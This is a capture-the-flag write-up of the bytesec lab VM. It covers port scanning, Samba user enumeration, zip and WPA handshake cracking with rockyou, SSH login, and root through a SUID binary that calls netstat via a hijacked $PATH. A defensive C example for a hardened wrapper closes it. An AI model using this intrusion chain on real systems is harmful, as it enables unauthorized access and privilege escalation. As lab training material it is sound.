For the Indonesian version of this write-up, click here.
I run the VM in VirtualBox with a bridged adapter. Some machines require a specific hostname in /etc/hosts; otherwise, you can still add the machine's IP address to /etc/hosts to make things easier and simpler. Here I used bytesec.vh as the machine's hostname.
nmap -sV -sC -p- bytesec.vh -oN initial.nmap -v
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5ECF6AFD7D00CCBE6B3C7AA8FD31BDE8
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| 2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
| 256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_ 256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
MAC Address: 08:00:27:B3:78:46 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The server runs HTTP at port 80, SMB at 139 and 445, and SSH at 2525.
gobuster dir -u http://bytesec.vh -w /usr/share/wordlists/dirb/big.txt
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/gallery (Status: 301)
/html (Status: 301)
/img (Status: 301)
/js (Status: 301)
/news (Status: 301)
/server-status (Status: 403)
Nothing really interesting here. But I found this image in
Does this machine have the BlueKeep vulnerability? 😕
BlueKeep is a remote code execution vulnerability that exists in Remote Desktop Services — formerly known as Terminal Services — when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (Microsoft)
Enum4linux is a tool for enumerating information from Windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net, and nmblookup.
We use enum4linux to gather information such as the domain, the OS running on the host, the SMB version, and even the users in the domain.
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)
From the enum4linux result above, we got 3 users. After trying to log in with each username, smb is the only one able to log in.
smbclient //bytesec.vh/smb -U smb -p
It turns out that save.zip is locked with a password, so we can try to brute-force it using fcrackzip:
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
And the password is cracked:
PASSWORD FOUND!!!!: pw == hacker1smb:
The content of save.zip is one image named secret.jpg, which contains no "secret", and a packet capture file named user.cap.
After examining user.cap for a while, there are lots of deauth packets. We can assume that this is a packet capture from someone trying to capture the three-way handshake between a wifi client and an access point (using aireplay). We can use aircrack to crack the captured three-way handshake:
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
snowflake is the wifi password.
Now SSH to port 2525 using the ESSID from user.cap (blackjax) as the username and the cracked password (snowflake).
Next we can do system enumeration using linenum.sh. Make sure to run the script from a directory with rwx permissions such as /tmp.
[-] SUID files:
-rwsr-xr-x 1 root root 7432 Nov 4 20:00 /usr/bin/netscan
One particularly interesting point is a file (or script?) named netscan that has the SUID/SETUID flag set. The SUID/SETUID flag means we can run the associated file with root permission without providing any password. Also, netscan is a file that normally does not exist on other systems.
It turns out that netscan is actually a "script" that runs netstat, created by someone to just output the established connections. With that logic in mind, we can trick the system by "changing" the
1. Create a file named netstat in /tmp:
echo "/bin/sh" > netstat
2. Add the /tmp directory to $PATH.
And we get root 😃
So how does it work?
Basically we manipulate the flow of the netscan script. The script is supposed to call the real netstat, a tool that shows all active connections, but because we overwrite the environment variable ($PATH), the script calls the fake netstat instead.
Actually, overwriting $PATH alone is not enough for privilege escalation. But because netscan has the SUID flag, netscan invokes a root shell instead.
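Since the whole escalation rests on netscan resolving netstat through the caller's $PATH while running as root, the defensive fix is for a privileged wrapper to never trust its caller's environment. The C program below is an added example, not the netscan binary from the VM or anything the write-up's author published. It shows an audit check (path_is_trusted) that flags a PATH containing /tmp, relative or empty entries, beside a hardened wrapper body (run_netstat_safely) that discards the inherited environment and executes netstat only by absolute path, so a fake netstat dropped in /tmp is never picked up. The trusted directory list, the /bin/netstat location and the netstat flags are my assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added example, not code from the write-up or from the bytesec VM.
 * Directories a privileged wrapper may trust (assumption: stock Ubuntu layout). */
static const char *const TRUSTED_DIRS[] = {
    "/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"
};
#define SAFE_PATH "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

/* Audit helper: return 1 if every entry of a PATH string is one of TRUSTED_DIRS,
 * 0 if any entry is empty (an empty entry means the current directory),
 * relative, or outside the trusted set. The vulnerable netscan effectively
 * trusted whatever its caller put here, which is why /tmp in front of PATH worked. */
int path_is_trusted(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;
    const char *seg = path;
    for (;;) {
        const char *end = strchr(seg, ':');
        size_t len = end ? (size_t)(end - seg) : strlen(seg);
        if (len == 0 || seg[0] != '/')
            return 0;                           /* "" or "." style entry: resolves via cwd */
        int known = 0;
        for (size_t i = 0; i < sizeof TRUSTED_DIRS / sizeof TRUSTED_DIRS[0]; i++) {
            if (strlen(TRUSTED_DIRS[i]) == len && strncmp(TRUSTED_DIRS[i], seg, len) == 0) {
                known = 1;
                break;
            }
        }
        if (!known)
            return 0;                           /* e.g. /tmp or a user-writable directory */
        if (end == NULL)
            return 1;
        seg = end + 1;
    }
}

/* Hardened wrapper body: never consult the caller's PATH. Execute netstat by an
 * absolute path with a fixed, minimal environment, and return its exit status
 * (-1 if the path is not absolute or the child could not be started or waited on,
 * 127 if execve itself failed, mirroring the shell convention). */
int run_netstat_safely(const char *netstat_abs_path)
{
    if (netstat_abs_path == NULL || netstat_abs_path[0] != '/')
        return -1;                              /* refuse bare names like "netstat" */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "netstat", "-tn", NULL };   /* numeric TCP connections */
        char *const envp[] = { "PATH=" SAFE_PATH, NULL };  /* caller's environment discarded */
        execve(netstat_abs_path, argv, envp);
        _exit(127);                             /* only reached if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Report whether the inherited PATH would have been safe to trust, then run
     * netstat regardless, because the wrapper does not depend on it. */
    printf("inherited PATH trusted: %s\n", path_is_trusted(getenv("PATH")) ? "yes" : "no");
    int rc = run_netstat_safely("/bin/netstat");   /* assumption: net-tools installed here */
    printf("netstat exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Build it with cc and run it with PATH=/tmp:$PATH in front: the audit reports the PATH as untrusted, yet the real netstat still runs, because the wrapper resolves nothing through PATH. One caveat worth knowing when auditing a box like this: the Linux kernel ignores the setuid bit on interpreter (#!) scripts, so a SUID "script" that actually escalates, as netscan does here, has to be a compiled binary; listing SUID files and checking each one for relative command names is the corresponding detection step.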
That's all for today, hope you guys like it *Dave Lee voice* 👋